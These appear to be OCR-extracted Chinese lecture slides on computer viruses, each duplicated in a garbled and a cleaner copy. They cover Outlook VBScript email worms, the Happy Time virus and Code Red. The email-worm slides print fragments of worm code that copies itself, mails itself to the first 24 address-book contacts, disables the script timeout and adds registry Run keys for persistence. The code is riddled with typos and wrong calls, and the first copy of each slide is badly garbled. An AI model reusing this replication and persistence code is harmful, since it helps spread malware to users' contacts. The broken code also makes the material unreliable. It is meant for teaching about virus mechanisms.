4电子邮件病毒 在1998年正式发现某些计算机病毒可在用 户运行 Outlook98测试版的ema时进行 传播,之后,有关电子邮件病毒不断见之 报道,成为计算机病毒的又一生力军。 这类病毒主要是利用 Outlook的人性化, 与脚本的高度集成。 利用 Outlook传播的病毒基本上都是用 VBScript编写的,其自身复制的原理是利 用程序将本身的脚本内容复制到临时文件, 将其作为附件发送出去
4.电子邮件病毒 在1998年正式发现某些计算机病毒可在用 户运行Outlook 98测试版的email时进行 传播,之后,有关电子邮件病毒不断见之 报道,成为计算机病毒的又一生力军。 这类病毒主要是利用Outlook的人性化, 与脚本的高度集成。 利用Outlook传播的病毒基本上都是用 VBScript编写的,其自身复制的原理是利 用程序将本身的脚本内容复制到临时文件, 将其作为附件发送出去
创建文件系统对象 Set so=CreateObject("Scripting. File Systemobject") 打开脚本文件 Wscript. ScripFullName:用 GetF函数获得该文件,用copy函数将 此文件复制到c盘根目录下,取名Dvbs so. GerFile(Wscript. ScripFullName), Copy ("C: ID vbs) 禁止 File Systemobjec这个对象即可有效 阻止这类病毒的传播。 禁止 File Systemobjec对象的命令 regsvr 32 scrrun. dl/u
创建文件系统对象 Set so=CreateObject("Scripting.FileSystemObject") 打开脚本文件Wscript.ScripFullName:用 GetFile函数获得该文件,用Copy函数将 此文件复制到C盘根目录下,取名D.vbs so.GerFile(Wscript.ScripFullName),Copy("C:\D.vbs) 禁止FileSystemObject这个对象即可有效 阻止这类病毒的传播。 禁止FileSystemObject对象的命令: regsvr 32 scrrun.dll/u
利用 Outlook传播的电子邮件病毒都会向 地址簿中存储的电子邮件地址发送内容 相同的脚本附件 利用了 Outlook地址簿的功能 从地址簿中选择前24个用户发送电子邮 件,并将脚本作为附件。 利用循环不断发送相同内容的邮件
利用Outlook传播的电子邮件病毒都会向 地址簿中存储的电子邮件地址发送内容 相同的脚本附件。 利用了Outlook地址簿的功能 从地址簿中选择前24个用户发送电子邮 件,并将脚本作为附件。 利用循环不断发送相同内容的邮件
创建 Outlook的应用对象 Set virus=CreteObject( Outlook Application") On Error Resume Next 循环24次,从地址簿中取出24条邮件地址,发送带附件的邮件: For y=1 To 24 Set mailvirus. Createltem(o) (取邮件地址: Mail to=virus. Create Space( MAPl").AddressLists(1)Address Entries(y) (邮件主题:) Mail Subject= (邮件内容 Mail, body= (邮件附件:) Mail Attachments. Add(c: D. vbs") (发送邮件:) Mail send Next Virus. Quit
创建Outlook的应用对象: Set virus=CreteObject("Outlook.Application") On Error Resume Next 循环24次,从地址簿中取出24条邮件地址,发送带附件的邮件: For y=1 To 24 Set mail=virus.CreateItem(0) (取邮件地址:) Mail.to=virus.CreateSpace("MAPI").AddressLists(1).Address Entries(y) (邮件主题:) Mail.Subject=" " (邮件内容:) Mail.body=" " (邮件附件:) Mail.Attachments.Add("C:\D.vbs") (发送邮件:) Mail.Send Next Virus.Quit
调整脚本语言的超时设置 n Error resume next Dim wsc.rr (创建She对象:) set wscr=CreateObject( Wscript. Shell (读注册表信息:) rr=wscr. RegRead("HKEY CURRENT_ USERISoftwarelMicr osoftlWindows Scripting HostISettingslTimeout") (如果键值≥1,则修改键值为0:) if(rr>=1)then wscr. Reg Read HKEY CURRENT USERISoftwarelMicros oftwindows Scripting Host SettingslTimeout 0,REG DWORD) endif
调整脚本语言的超时设置 n Error Resume Next Dim wsc,rr (创建Shell对象:) set wscr=CreateObject("Wscript.Shell") ( 读注册表信息:) rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout") (如果键值1,则修改键值为0:) if(rr>=1)then wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting Host\ Settings\Timeout", 0,"REG_DWORD") endif
为了使病毒掌握系统控制权,通常采用修 改注册表的方式,下面的语句就是通过修改 注册表,使得系统每次启动后自动执行脚 本 recreate HKEY LOCAL MACHINE\Microsoft WIndows currentversion\Run \MSKemel32" dirsystem&\MSKemel32 vbs recreate HKEY LOCAL MACHINEIMicrosoft WindowslCurrentVersion\Run Services Win irwin WIn 32DLL vbs MSKemel32vbs和Win32 DLL Vbs是病 毒脚本的副本
为了使病毒掌握系统控制权,通常采用修 改注册表的方式,下面的语句就是通过修改 注册表,使得系统每次启动后自动执行脚 本 regcreate "HKEY_LOCAL_MACHINE\Microsoft \Windows\CurrentVersion\Run \MSKemel32", dirsystem&”\MSKemel32.vbs regcreate "HKEY_LOCAL_MACHINE\Microsoft \Windows\CurrentVersion\RunServices\ Win32DLL",dirwin&"\Win32DLL.vbs MSKemel32.vbs 和 Win32DLL.vbs 是 病 毒脚本的副本
7.73欢乐时光( happy time, help script) 病毒感染文件类型: asp htm html vbs。 病毒依赖的操作系统: Win9 x/Winnt/win2000。 病毒表现形式为: (1)执行一次注册表项 HKEY CURRENT USERISoftware HelplCount就加 (2)默认的邮件处理器会弹出,并不停的 给邮件地址中某些信箱发邮件,邮件的 主题是Help,附件是 Untitled.htm;
7.7.3欢乐时光(happy time,help.script) 病毒感染文件类型:asp htm html vbs。 病毒依赖的操作系统: Win9x/Winnt/Win2000。 病毒表现形式为: (1)执行一次注册表项 HKEY_CURRENT_USER\Software\ Help\Count就加一 (2)默认的邮件处理器会弹出,并不停的 给邮件地址中某些信箱发邮件,邮件的 主题是Help,附件是\Untitled.htm;
(3)HKEY CURRENT USERIControl anelldesktoplwallpaper指向病毒的本身; (4)在注册表中写入 HKEY CURRENT USERISoftwarehelp 共有三项: filename, count wallpaper (5)写文件系统目录 help. vbs,系统目录 Untitled.htm (6)在系统目录下创建 Help. hta; (7)Htm文件被打开后表现为 loading help
(3)HKEY_CURRENT_USER\Control anel\desktop\wallpaper指向病毒的本身; (4)在注册表中写入 HKEY_CURRENT_USER\Software\help, 共有三项:filename,count, wallpaper; (5)写文件系统目录help.vbs,系统目录 Untitled.htm; (6)在系统目录下创建Help.hta; (7)Html文件被打开后表现为loading help……
病毒发作与破坏方式为: 如果病毒被执行时,日期的月份和日期的相 加和是13,注册表项 HKEY CURRENT USERISoftware helplfilename中的文件类 型是EXE或是DLL则此文件被删除 Happtime病毒的发作日期是月+日=13时发 作,第一次发作是2001年5月8日 Happytime的典型症状和现象:超级解霸总 是不断的运行;会弹出一个一个的记事本, 上面写着 I am sorry…、(或help),而且是不停 的弹出,总是不断的运行;按ctr+ alt+del可 以看到有很多的 Scrip在运行,系统资源非 常的低;硬盘上的所有exe和l文件被删除
病毒发作与破坏方式为: 如果病毒被执行时,日期的月份和日期的相 加和是13,注册表项HKEY_CURRENT_ USER\Software\help\filename中的文件类 型是 EXE 或是 DLL 则此文件被删除。 Happtime病毒的发作日期是月+日=13时发 作,第一次发作是2001 年 5 月 8日。 Happytime的典型症状和现象:超级解霸总 是不断的运行;会弹出一个一个的记事本, 上面写着I am sorry...( 或help),而且是不停 的弹出,总是不断的运行;按ctrl+alt+del 可 以看到有很多的wscript在运行,系统资源非 常的低;硬盘上的所有exe 和dll文件被删除
7.8“红色代码”病毒( Code red, Code redl) 红色代码”病毒别名为:W32/ Bady. worm。 在一些版本的Ⅲs上发现的索引服务漏洞已经 被一个名为“红色代码”(“ code red”)的 蠕虫利用并传播,在被感染的页面上赫然出 现“ Hacked by Chinese”。 索引服务漏洞存在于!40和ls50中,Is 运行在wnnt、win2000及 win xp beta版。 该漏洞允许远程入侵者在染毒机器中运行任 意的代码
7.8 “红色代码”病毒 (Code red,Code redII ) “红色代码”病毒别名为:W32/Bady.worm 。 在一些版本的IIS上发现的索引服务漏洞已经 被一个名为“红色代码”(“code red”)的 蠕虫利用并传播,在被感染的页面上赫然出 现“Hacked by Chinese” 。 索引服务漏洞存在于IIS 4.0 和 IIS 5.0中,IIS 运行在winnt 、win2000 及win xp beta 版。 该漏洞允许远程入侵者在染毒机器中运行任 意的代码